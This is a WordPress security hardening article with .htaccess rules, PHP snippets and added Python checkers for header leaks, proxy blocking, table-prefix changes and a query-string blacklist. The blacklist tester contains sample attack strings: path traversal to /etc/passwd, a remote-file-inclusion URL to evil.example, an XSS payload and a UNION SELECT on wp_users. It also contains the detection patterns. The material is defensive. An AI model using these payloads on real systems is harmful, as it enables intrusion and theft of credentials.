Tips and Tricks HQ

  • Home
  • Blog
  • Projects
    • All Projects
    • Simple WP Shopping Cart
    • WP Express Checkout Plugin
    • WP Download Monitor
    • WP Security and Firewall Plugin
    • WP eStore Plugin
    • WP Affiliate Platform
    • WP eMember
    • WP Lightbox Ultimate
    • WP Photo Seller
  • Products
    • All Products
    • Checkout
  • Support
    • Support Portal
    • Customer Only Forum
    • WP eStore Documentation
    • WP Affiliate Software Documentation
    • WP eMember Documentation
  • Contact

Advanced WordPress Security Tips


Last updated: March 26, 2013





This is a follow-up from the Essential WordPress Security Tips article.

In general WordPress is pretty secure as long as you apply common sense and follow standard security practices. The tips mentioned in this article are for added security (you don’t need to apply them all).

However, if you are in the mood for some advanced tweaking then the following security tips should come in handy 😉

NOTE and DISCLAIMER

Most of these techniques require you to understand what you are doing.

It is strongly recommended that you first test these techniques on a test or development site before applying them to your live site. Some of the tips suggested here can break your site if not performed correctly.

We take no responsibility for any mishaps as a result of your efforts in applying the techniques discussed in this article.

Also note that these techniques assume that your WordPress installation is running Apache with mod_rewrite enabled and with AllowOverride permitting .htaccess files to use it (mod_alias is also assumed to be available, although the snippets below rely on mod_rewrite only). If you run nginx or another web server, the .htaccess snippets do not apply and the equivalent rules must be written in that server's own configuration.

1. Disable HTTP Trace Method

HTTP TRACE is a diagnostic method: the server answers by echoing the request it received, headers included, back to the client. An attack technique called Cross Site Tracing (XST) combines this with Cross Site Scripting (XSS): script running in the victim's browser issues a TRACE request and reads the echoed Cookie and Authorization headers out of the response, which exposes credentials that the HttpOnly cookie flag would otherwise hide from script. Current browsers refuse to send TRACE from XMLHttpRequest or fetch, so the practical risk today is small, but the method has no legitimate use on a production site and disabling it costs nothing. Apache answers TRACE by default.

The cleanest fix is TraceEnable off in the main Apache configuration (httpd.conf or a virtual host; the directive is not allowed in .htaccess). If you only have access to .htaccess, the following mod_rewrite rules refuse the method with a 403 instead:

RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F,L]

To verify, send a TRACE request from the command line with curl -i -X TRACE http://yoursite.example/ and confirm that the response is a 403 (rewrite rule) or 405 (TraceEnable off) rather than a 200 that echoes your request back.

2. Remove header outputs from your WordPress installation

WordPress adds a number of link and meta tags to the head of every page that advertise facts about the installation: the version number (generator tag), the XML-RPC endpoint (EditURI/RSD and Windows Live Writer manifest links), feed URLs, shortlinks and relational links between posts. None of this is needed by a normal visitor, and the version string in particular tells an attacker which known vulnerabilities to try first, so remove what you do not use. The following code shows how.

Warning: this can break some functionality if you are not careful. If you want feed readers to auto-discover your RSS feeds, comment out the two feed_links lines. The noindex callback should normally be left alone: it emits the robots noindex tag that enforces the "Discourage search engines" option under Settings -> Reading, so removing it silently re-exposes a site you meant to hide. Note also that removing the generator tag from the page head does not remove the version from your RSS and Atom feeds; that needs a filter on the_generator.

Add the following code to your theme’s functions.php file:

// Links that reveal the XML-RPC endpoint and remote-publishing support
remove_action('wp_head', 'rsd_link');
remove_action('wp_head', 'wlwmanifest_link');
// Version number: <meta name="generator" content="WordPress x.y" />
remove_action('wp_head', 'wp_generator');
// Feed auto-discovery links (keep these if feed readers should find your feeds)
remove_action('wp_head', 'feed_links', 2);
remove_action('wp_head', 'feed_links_extra', 3);
// rel="shortlink" exposes the ?p=ID form of every URL
remove_action('wp_head', 'wp_shortlink_wp_head', 10);
// Relational links: index, parent, start and prev/next posts
// (the first three are no-ops since WordPress 3.3 but are harmless to remove)
remove_action('wp_head', 'index_rel_link');
remove_action('wp_head', 'parent_post_rel_link', 10);
remove_action('wp_head', 'start_post_rel_link', 10);
remove_action('wp_head', 'adjacent_posts_rel_link_wp_head', 10);
// Removing noindex disables the "Discourage search engines" robots tag;
// leave it commented out unless you have a reason to do that.
// remove_action('wp_head', 'noindex', 1);
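To confirm that the change above actually took effect, save the HTML of your home page and scan its head for the tags the functions.php snippet is meant to suppress. The Python auditor below does that; it is an added example, not code from the article or from WordPress. The sample head (including the version number) is constructed to look like a WordPress 3.5-era page, and the tag shapes it matches are the ones WordPress core prints. It also reports the ?ver= query string that WordPress appends to enqueued scripts and styles, since the version leaks there too and the snippet above does not touch it.

```python
import re
from html.parser import HTMLParser

# Head markup that each wp_head callback emits, keyed by the callback name used
# in the remove_action() calls above.  Attribute matching is deliberately loose.
LEAK_SIGNATURES = {
    "wp_generator": ("meta", {"name": "generator"}),
    "rsd_link": ("link", {"rel": "EditURI"}),
    "wlwmanifest_link": ("link", {"rel": "wlwmanifest"}),
    "feed_links": ("link", {"type": "application/rss+xml"}),
    "wp_shortlink_wp_head": ("link", {"rel": "shortlink"}),
}

# Constructed sample: what an unhardened head looks like.  Not captured from a real site.
SAMPLE_HEAD = """<head>
<title>Example</title>
<link rel="alternate" type="application/rss+xml" title="Example Feed" href="https://example.com/feed/" />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://example.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://example.com/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 3.5.1" />
<link rel="shortlink" href="https://example.com/?p=123" />
<link rel="stylesheet" href="https://example.com/wp-content/themes/t/style.css?ver=3.5.1" />
<script src="https://example.com/wp-includes/js/jquery/jquery.js?ver=1.8.3"></script>
</head>"""


class HeadAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = {}            # callback name -> list of leaked values
        self.versioned_assets = [] # (url, version) pairs from ?ver= query strings

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        for callback, (want_tag, want_attrs) in LEAK_SIGNATURES.items():
            if tag == want_tag and all(
                attrs.get(k, "").lower() == v.lower() for k, v in want_attrs.items()
            ):
                self.found.setdefault(callback, []).append(attrs.get("content") or attrs.get("href", ""))
        url = attrs.get("src") or attrs.get("href") or ""
        match = re.search(r"[?&]ver=([\d.]+)", url)
        if tag in ("script", "link") and match:
            self.versioned_assets.append((url, match.group(1)))


def audit_head(html):
    """Return which suppressed callbacks still produce output, and which assets carry ?ver=."""
    parser = HeadAuditor()
    parser.feed(html)
    return {"leaks": parser.found, "versioned_assets": parser.versioned_assets}


if __name__ == "__main__":
    report = audit_head(SAMPLE_HEAD)
    for callback, values in report["leaks"].items():
        print(f"still emitted by {callback}: {values}")
    for url, version in report["versioned_assets"]:
        print(f"version {version} visible in {url}")
```

Run it over a saved copy of your own page (for example the output of curl -s https://yoursite.example/) rather than the embedded sample to audit a real installation.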

3. Deny comment posting via proxy server

Many comment spammers post through open proxies, and a proxied request usually carries headers such as Via, X-Forwarded-For or Proxy-Connection that a direct browser request does not. The rules below (compliments of perishablepress.com) refuse any POST to the front end of the site that carries one of those headers; requests to wp-login.php, wp-admin, the plugins directory and wp-includes are exempted so that administration keeps working. Two caveats before you put this in your .htaccess file: it blocks every front-end POST, not only comment forms (contact forms and checkout pages included), and if your site sits behind a CDN, load balancer or reverse proxy, every request reaches Apache with X-Forwarded-For set, so the rule would refuse all of them. Test by posting a comment from a normal browser before leaving it in place.

Note that mod_rewrite looks the %{HTTP:...} header up by the exact name given, so the header names are spelled here as they appear on the wire (hyphenated) rather than in the underscore form the original snippet used:

RewriteCond %{REQUEST_METHOD} =POST
RewriteCond %{HTTP:Via}%{HTTP:Forwarded}%{HTTP:Useragent-Via}%{HTTP:X-Forwarded-For}%{HTTP:Proxy-Connection} !^$ [OR]
RewriteCond %{HTTP:Xproxy-Connection}%{HTTP:PC-Remote-Addr}%{HTTP:Client-IP} !^$
RewriteCond %{REQUEST_URI} !^/(wp-login\.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC]
RewriteRule .* - [F,NS,L]
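The Python function below mirrors the logic of those four RewriteCond lines so you can see, request by request, what the rule will and will not refuse. It is an added example, not part of the article or of Apache; the sample requests and their header values are constructed, and the header names assume the hyphenated on-the-wire spelling (Via, X-Forwarded-For and so on). The last sample shows the CDN case from the caveat above: a perfectly ordinary contact-form submission that the rule blocks because the edge proxy added X-Forwarded-For.

```python
from urllib.parse import urlsplit

# The request headers the .htaccess rule inspects; any non-empty value counts as
# "came through a proxy".  Spelled as they appear on the wire (hyphenated).
PROXY_HEADERS = (
    "Via", "Forwarded", "Useragent-Via", "X-Forwarded-For", "Proxy-Connection",
    "Xproxy-Connection", "PC-Remote-Addr", "Client-IP",
)
# Path prefixes exempted by the REQUEST_URI condition so that admin and login keep working.
EXEMPT_PREFIXES = ("/wp-login.php", "/wp-admin/", "/wp-content/plugins/", "/wp-includes/")


def proxy_headers_present(headers):
    """Names of the proxy-revealing headers that carry a value (case-insensitive lookup)."""
    present = {name.lower() for name, value in headers.items() if value}
    return [h for h in PROXY_HEADERS if h.lower() in present]


def would_deny(method, uri, headers):
    """True when the rule set would answer 403: a POST, with a proxy header,
    to a path that is not on the exemption list (compared case-insensitively, like [NC])."""
    if method != "POST":
        return False
    if not proxy_headers_present(headers):
        return False
    path = urlsplit(uri).path.lower()
    return not path.startswith(EXEMPT_PREFIXES)


# Constructed sample requests: (label, method, request URI, headers).
SAMPLE_REQUESTS = [
    ("direct comment", "POST", "/wp-comments-post.php",
     {"Host": "example.com", "User-Agent": "Mozilla/5.0"}),
    ("comment via open proxy", "POST", "/wp-comments-post.php",
     {"Host": "example.com", "Via": "1.1 proxy.example.net"}),
    ("login via corporate proxy (exempt path)", "POST", "/wp-login.php",
     {"Host": "example.com", "X-Forwarded-For": "10.0.0.7"}),
    ("page view via proxy (not a POST)", "GET", "/?p=123",
     {"Host": "example.com", "X-Forwarded-For": "10.0.0.7"}),
    ("contact form behind a CDN", "POST", "/contact/",
     {"Host": "example.com", "X-Forwarded-For": "203.0.113.9", "CF-Connecting-IP": "203.0.113.9"}),
]


def evaluate(requests=SAMPLE_REQUESTS):
    """Map each sample label to whether the rule set denies it."""
    return {label: would_deny(method, uri, headers) for label, method, uri, headers in requests}


if __name__ == "__main__":
    for label, denied in evaluate().items():
        print(f"{'DENY ' if denied else 'allow'}  {label}")
```

If you do run behind a CDN or reverse proxy, the usual fix is to have the edge strip or rewrite these headers before they reach Apache, or to drop this rule and rely on a comment-spam plugin instead.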

4. Change your default WordPress DB prefix

You may already be aware that WP uses a default prefix of "wp_" for its database tables. An attacker who finds a SQL injection flaw in a plugin can therefore aim straight at wp_users or wp_options without any reconnaissance, and most automated injection payloads hard-code those names. Be realistic about the benefit, though: anyone with a working injection can list your real table names from information_schema, so a custom prefix defeats only fully automated attacks. It is cheap defence in depth, not a substitute for fixing the injection.

Changing the prefix is much easier at installation time, when you set $table_prefix in wp-config.php before running the installer.

If you already have a live WP site and wish to change the prefix, the procedure is a little more involved.

A basic guide for changing the prefix after an install, for those who are curious, is briefly outlined below:

1) Take a full backup of the site (files and database) and store it somewhere other than the web server. A plugin such as BackupBuddy can be useful here.
2) Export the WordPress database with phpMyAdmin to a text (.sql) file and keep two copies: one for editing and an untouched original in case you need to start over.
3) Using a good code editor, replace the "wp_" prefix of the table names in the editing copy with your own prefix (see the caution below about what not to replace).
4) From your WP admin panel, deactivate all plugins.
5) Using phpMyAdmin, import the edited file into a new, empty database (drop the old tables only after the import has succeeded and you have verified that the site works).
6) Edit the $table_prefix value in wp-config.php to the new prefix (and the database name, if you imported into a new database).
7) Re-activate your WP plugins.
8) Save your permalink settings again under Settings -> Permalinks to refresh the rewrite rules.

Caution:

Some plugins add their own prefix after the WordPress prefix, and the two can be identical. For example, a plugin table might be named wp_wp_abc_table_name. When you replace "wp_" in step 3, replace only the leading prefix, not the one following it. With a new prefix of "trx_" the table above becomes:

trx_wp_abc_table_name

A blind search-and-replace of every "wp_" in the dump is dangerous for a second reason: the string occurs inside data, not only in table names. Post content or theme settings that happen to mention wp_ are changed, and where the value is a PHP-serialized string (many plugin options are) the stored byte length no longer matches and WordPress can no longer unserialize it. On the other hand, a few rows genuinely must change along with the tables: the option wp_user_roles and the user meta keys wp_capabilities and wp_user_level carry the prefix, and if they are left alone every account loses its role and nobody can log in as administrator. Prefer a search-and-replace tool that understands serialized data, or rename the tables in place and update those rows with explicit SQL.

Note that there are also WP plugins which perform the above steps for those who are not prepared to get their hands dirty.
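As an added example (not from the article, and not what any plugin does internally), the Python script below generates the SQL for the in-place alternative to steps 2 to 5: rename every table with RENAME TABLE instead of editing a dump, touching only the leading prefix so that wp_wp_abc_table_name becomes trx_wp_abc_table_name, and then fix the option and usermeta rows whose names embed the prefix. The table list is constructed to look like SHOW TABLES on a default single-site install; the set of prefixed usermeta keys is the one known to the author of this example and should be checked against your own database as the comment describes. Multisite installs, which use a per-blog prefix such as wp_2_, need more than this.

```python
import re

# Constructed table list, as SHOW TABLES would return it for a site on the
# default prefix.  The last name is the double-prefix case from the caution above.
SAMPLE_TABLES = [
    "wp_commentmeta", "wp_comments", "wp_links", "wp_options", "wp_postmeta",
    "wp_posts", "wp_term_relationships", "wp_term_taxonomy", "wp_terms",
    "wp_usermeta", "wp_users", "wp_wp_abc_table_name",
]

# Rows whose keys carry the prefix and must be renamed along with the tables.
# These are the core keys known to the author of this example; run
#   SELECT DISTINCT meta_key FROM wp_usermeta WHERE meta_key LIKE 'wp\_%';
# on your own database to find any that plugins added.  wp_options is NOT
# renamed wholesale on purpose: core options such as wp_page_for_privacy_policy
# start with "wp_" but are not prefix-dependent.
PREFIXED_OPTION_NAMES = ("user_roles",)
PREFIXED_USERMETA_KEYS = ("capabilities", "user_level", "user-settings", "user-settings-time")


def rename_table(name, old="wp_", new="trx_"):
    """Replace only the leading prefix: wp_wp_abc_table_name -> trx_wp_abc_table_name."""
    if not name.startswith(old):
        raise ValueError(f"{name!r} does not start with the prefix {old!r}")
    return new + name[len(old):]


def prefix_change_sql(tables, old="wp_", new="trx_"):
    """Return the statements that move a live site from prefix `old` to `new`
    without a dump/import: rename each table in place, then update the option
    and usermeta rows that embed the prefix."""
    if not re.fullmatch(r"[A-Za-z0-9_]+_", new):
        raise ValueError("prefix must contain only letters, digits and underscores and end with '_'")
    statements = [f"RENAME TABLE `{t}` TO `{rename_table(t, old, new)}`;" for t in tables]
    options_table, usermeta_table = new + "options", new + "usermeta"
    for opt in PREFIXED_OPTION_NAMES:
        statements.append(
            f"UPDATE `{options_table}` SET option_name = '{new}{opt}' "
            f"WHERE option_name = '{old}{opt}';"
        )
    for key in PREFIXED_USERMETA_KEYS:
        statements.append(
            f"UPDATE `{usermeta_table}` SET meta_key = '{new}{key}' "
            f"WHERE meta_key = '{old}{key}';"
        )
    return statements


if __name__ == "__main__":
    print("-- Run only after a full backup, with plugins deactivated;")
    print("-- then set $table_prefix = 'trx_'; in wp-config.php and re-save permalinks.")
    print("\n".join(prefix_change_sql(SAMPLE_TABLES)))
```

RENAME TABLE is a DDL statement in MySQL and commits implicitly, so there is no transaction to roll back; the backup from step 1 is your undo.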

5. Deny Potentially Dangerous Query Strings

The rule set below, placed in your .htaccess file, refuses any request whose query string contains patterns that show up constantly in automated attack traffic: directory traversal (../), remote file inclusion via ftp:, http: or https: URLs, Joomla's old mosConfig parameters, raw or URL-encoded HTML and shell metacharacters, and common SQL keywords. It is a blacklist, so it stops only payloads that look like the patterns listed. It does nothing for input that arrives in POST bodies, cookies or headers, and it is not a substitute for plugins and themes that escape their output properly, which is what actually prevents XSS.

BEWARE: the matching is plain substring matching, so legitimate requests are refused whenever they happen to contain one of the strings. Known casualties are tag archives when pretty permalinks are off (?tag=security trips the tag= line), searches containing ordinary words such as select, insert, drop or request, any non-ASCII search term (?s=caf%C3%A9 trips the %C pattern, as does every other URL-encoded byte from %A0 upward), and any plugin or theme that passes a URL in the query string. Review your site's own URLs and remove or narrow the lines that collide with them.

# QUERY STRING EXPLOITS
<IfModule mod_rewrite.c>
RewriteEngine On
# directory traversal, Windows system files, tag archives, remote file inclusion, Joomla mosConfig
RewriteCond %{QUERY_STRING} \.\./ [NC,OR]
RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
RewriteCond %{QUERY_STRING} tag= [NC,OR]
RewriteCond %{QUERY_STRING} ftp: [NC,OR]
RewriteCond %{QUERY_STRING} http: [NC,OR]
RewriteCond %{QUERY_STRING} https: [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
# raw metacharacters (brackets, parentheses, ? and * are regex specials and must be backslash-escaped)
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|'|"|;|\?|\*).* [NC,OR]
# the same characters URL-encoded: " ' < > \ { |
RewriteCond %{QUERY_STRING} ^.*(%22|%27|%3C|%3E|%5C|%7B|%7C).* [NC,OR]
# encoded control characters, encoded high-bit bytes and the loopback address
RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
# register_globals style variable names and local host names, then SQL keywords
RewriteCond %{QUERY_STRING} ^.*(globals|encode|config|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare|drop).* [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>
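Before enabling the rule set, it is worth seeing exactly which of your own URLs it would refuse. The Python script below is an added example (not from the article, and not Apache's matcher) that carries the same twelve patterns as Python regular expressions, evaluates them in order against the raw, still URL-encoded query string the way mod_rewrite does, and reports the first rule that fires. The sample query strings are constructed: four attack-shaped ones, and six ordinary WordPress requests of which four are refused.

```python
import re

# The RewriteCond patterns from the .htaccess block above, as Python regexes.
# Apache's [NC] flag corresponds to re.IGNORECASE; Apache tests the raw query
# string, so percent-encoding is matched literally rather than decoded first.
QUERY_STRING_RULES = [
    ("traversal",         r"\.\./"),
    ("boot.ini",          r"boot\.ini"),
    ("tag=",              r"tag="),
    ("ftp:",              r"ftp:"),
    ("http:",             r"http:"),
    ("https:",            r"https:"),
    ("mosConfig",         r"mosConfig"),
    ("raw metachar",      r"[\[\]()<>'\";?*]"),
    ("encoded metachar",  r"%22|%27|%3C|%3E|%5C|%7B|%7C"),
    ("control/high byte", r"%0|%A|%B|%C|%D|%E|%F|127\.0"),
    ("config words",      r"globals|encode|config|localhost|loopback"),
    ("sql words",         r"request|select|insert|union|declare|drop"),
]
COMPILED_RULES = [(label, re.compile(pattern, re.IGNORECASE)) for label, pattern in QUERY_STRING_RULES]


def blocked_by(query_string):
    """Label of the first rule that would refuse this query string, or None if it passes."""
    for label, regex in COMPILED_RULES:
        if regex.search(query_string):
            return label
    return None


# Constructed samples.  ATTACK_QUERIES are shaped like mass-exploitation traffic;
# LEGITIMATE_QUERIES are ordinary WordPress URLs, several of which the rules also refuse.
ATTACK_QUERIES = [
    "file=../../../../etc/passwd",
    "page=http://evil.example/shell.txt",
    "s=%3Cscript%3Ealert(1)%3C/script%3E",
    "id=1+union+select+user_login,user_pass+from+wp_users",
]
LEGITIMATE_QUERIES = [
    "p=123",                    # passes: plain post ID
    "s=hello+world",            # passes: plain search
    "tag=security",             # refused: tag archive without pretty permalinks
    "s=select+a+theme",         # refused: search containing an SQL keyword
    "s=caf%C3%A9",              # refused: any URL-encoded non-ASCII character
    "url=http://example.com/",  # refused: plugin passing a URL in the query string
]


def classify(queries):
    """Map each query string to the rule that refuses it (or None)."""
    return {q: blocked_by(q) for q in queries}


def false_positives(queries=LEGITIMATE_QUERIES):
    """The legitimate requests that the rule set would refuse, in order."""
    return [q for q in queries if blocked_by(q) is not None]


if __name__ == "__main__":
    for q, label in classify(ATTACK_QUERIES + LEGITIMATE_QUERIES).items():
        print(f"{label or 'pass':18} ?{q}")
```

To audit a real site, feed the script the query strings from your access log (everything after the ? in the request path) instead of the samples, and drop or tighten the rules that fire on traffic you know to be legitimate.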

6. Apply PHP hardening to your system

Suhosin is a hardening patch and extension for the PHP interpreter that adds runtime checks such as limits on the number and size of request variables, protection against some classes of memory corruption in the engine, and a blacklist of dangerous functions. Some web hosts ship it by default; check with your hosting provider, or look for a suhosin section in the output of phpinfo().

Note that Suhosin was written for PHP 5 and has not kept up with later releases, so on PHP 7 and newer rely on the interpreter's own settings instead: expose_php = Off, a disable_functions list covering exec, shell_exec, system, passthru and proc_open if nothing on the site needs them, open_basedir to confine file access to the site's directory, and display_errors = Off in production.

You can read more about Suhosin on the project's own site.

Make sure to read the Essential WordPress Security Tips article if you haven’t done so already.

Comments (7 responses)

  1. Tommy says:
    November 11, 2013 at 11:33 am

    In another article on this site that lists a bunch of WP plugins there is the All in one WP security plugin available for DL. This is a great plugin and can help people with less knowledge of advanced security matters.

  2. dhenycahyoe says:
    November 29, 2012 at 4:36 pm

    Tips on good security, and it is easy to understand.
    thanks

  3. spinn says:
    September 9, 2012 at 9:03 am

    Ya, great security tips.. it's very useful to me..

  4. Peter Fisher says:
    July 26, 2012 at 5:16 pm

    This is a very good list of security tips. I liked this sentence ‘Most of these techniques require you to understand what you are doing.’ hehe
    I would recommend – as always – testing these in a development environment before hacking up production code. Like you said, some plugins may not work after these changes.

Copyright © 2023 | Tips and Tricks HQ